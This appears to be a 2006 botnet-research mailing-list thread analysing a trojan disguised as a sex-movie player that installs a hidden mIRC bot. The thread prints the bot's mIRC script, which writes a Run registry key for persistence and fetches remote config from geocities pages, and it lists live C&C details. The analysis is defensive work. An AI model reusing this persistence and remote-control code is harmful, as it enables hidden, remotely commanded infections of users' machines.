To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
UPDATE as of 05:30 GMT 03/20/06
Wiretapp/Nicholas Albright further analyzed the binary and determined that
it put a file, "svchost.exe" file in \windows\fonts In that directory,
several files with very recent creation dates were discovered.
The first file contains what appears to be the strings that comprise
sections of the USER string. A section is listed below:
The Ancient One.
524c5231-Mozilla/4.0 (compatible; MSIE 6.0; Window
the smartest beast around
Call 911
Bot Oficial do CaNaL Benguela
ele
Jasbir Singh
g
JonSmif's bot
/dev/null .
Property of ecko
The second file contains what appears to be the NICK strings that are
assigned to the controlled MIrc client.
Badri
Baerbel
Bagher
Balasamy
Baoguang
Barba
Bart
Basar
Basia
Bayraktar
Bean-San
Beat
Beate
Belinda
Bencheng
Ben-chieh
The third file contains what appears to be the MIrc scripting code used to
control the bot client installed by the malware. A segment is listed below:
(Thanks to obso for cleaning this up for us)
on 1:connect:
/.clearall |
.timer -m 10 200 /.clearall |
if ($readini($nopath($mircini), typecon, type) == 3)
{
.timerjo 1 5 .join -n $decode(Iy5XYXIu,m) $left($nopath($mircexe),3) $+
$right($mircexe,3)
} |
if ($readini($nopath($mircini), timed, time1) != $day)
{
.sockopen zair www.geocities.com 80
}
alias thatdO
{
return
$replace($1-,d0that,[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVe
rsion\Run])
}
alias thatd0
{
set %mircdir $replace($mircexe,\,\\) |
set %filetoboot $rand(1000,9999) $+ .reg |
write %filetoboot REGEDIT4 |
write %filetoboot $thatdO(d0that) |
write %filetoboot $+("windows"=",%mircdir,") |
.run -n regedit /s %filetoboot |
.timer 1 4 remove %filetoboot |
.timer 1 5 unset %filetoboot |
.timer 1 6 unset %mircdir
Shadowserver will continue to monitor this and keep you updated on any new
developments.
Andre'
--
SemperSecurus
-----Original Message-----
From: Andre' - SemperSecurus [mailto:[EMAIL PROTECTED]
Sent: Sunday, March 19, 2006 6:12 PM
To: [email protected]
Subject: [botnets] New Bot controlling Mirc client ?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I came across a malicious binary via a link to the following:
http://82. 38.6.249:5200/sex
At this point, it looks like the IP for the malware has changed, I'll let
the group know when I discover the new address.
The file installs a program that supposedly allows you to watch sex movies
on your PC.
Preliminary analysis of the file shows the following:
* The program launches what looks to be a legitimate Windows installer
program.
* Upon completion of the installation, an MIrc client is launched in the
background which connects to IRC.
* The pcap of the network session shows that a configuration or MIrc
scripting file of some kind is grabbed from
www.geocities.com/xA1r5/rehaz.htm There are actually 5 locations from which
a file can be grabbed www.geocities.com/xA1r?/rehaz.htm , where ? is 1-5
* After wget of the file, the following is noted:
za!r /.tmd
ZA!r /.rd1 typecon type 3
za!r /.rd1 typecon typed
KJlj0OnlkJnkmeljjnkJ908N-kmlOOM;/!tojHNJHN.kmn9ygkl89HB.AtHKJJSDAJDS.KAJD.AS
JDcxKJD
za!r /.rd1 wcnt 1 4,2
za!r /.rd1 wcnt 2 9,2
za!r /.rd1 wcnt 3 17,1
za!r /.rd1 webcodes posa 5
za!r /.rd1 webcodes webcode5 F!PxAl321r47jKlU57kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode4 F!PxAl321r47jKlU47kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode3 F!PxAl321r47jKlU37kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode2 FokxAl321r47jKlU27ko!/Ilo0rnbKJjkIjeh76fNalz
za!r /.rd1 webcodes webcode1 FokxAl321r47jKlU17ko!/Ilo0rnbKJjkIjeh76fNalz
za!r /.rd1 cntserv 1 13,1
za!r /.rd1 cntserv 2 8,2
za!r /.rd1 cntserv 3 68,1
za!r /.rd srv LkIwbmUuY29t
za!r /.rd prt NTAwNg==
za!r /.timer 1 3 $iif(warnet != $network,.server mlks.<removed> 5006)
* The srv LkIwbmUuY29t and prt NTAwNg== lines appear to be base64 encoded
which when decrypted yield the domain name and the port number.
This file most likely allows the bot operator to control the MIrc client via
the web page file. If he needs to modify the behavior of the client, he can
do it via the web page file.
* During the launch of the MIrc client on the infected computer, Windows
Media player starts and diplays a frame of a sex movie.
* The format of the NICK and USER strings do not appear to be random
characters as multiple execution runs of the file yielded English words as
segments of the USER string, and the NICK strings seemed to have a pattern
to them as well.
* It does not appear to be possible to properly join the channel unless
certain MODE and WATCH commands are passed.
I will continue to monitor the bot and study the malware and the config
files to try and obtain more information.
At this point, the bot is pretty quiet, I have only seen the following
command over the past few hours:
[WARNET] ( 86.137.160.146:5006) -> :[EMAIL PROTECTED] MODE #.war. -b *!*@
212.21.*
If anyone can shed any further light on the commands shown in the config
file above, it would be a huge help.
The following is the C&C information I have so far:
Server hostname: mlks.<removed>
Server IP: 86.137.160.146
Port: 5006
Server Password: [none]
NICK string: Teh-Wei
USER string: Eeke "hotmail.com " "mlks.<removed>" :Hi! I'm a human! What are
you?
Channel: #.War.
Channel Key: svcexe
Bot population: ~200
Report on Sex_Movies.avi.exe -
********************************************
MD5: e867443d92ae809cc12150375d43bbf2
AVG: No Virus Found
BitDefender: No Virus Found
ClamAV: Trojan.Muldrop.744
F-Prot: No Virus Found
Andre'
--
SemperSecurus
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and
server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
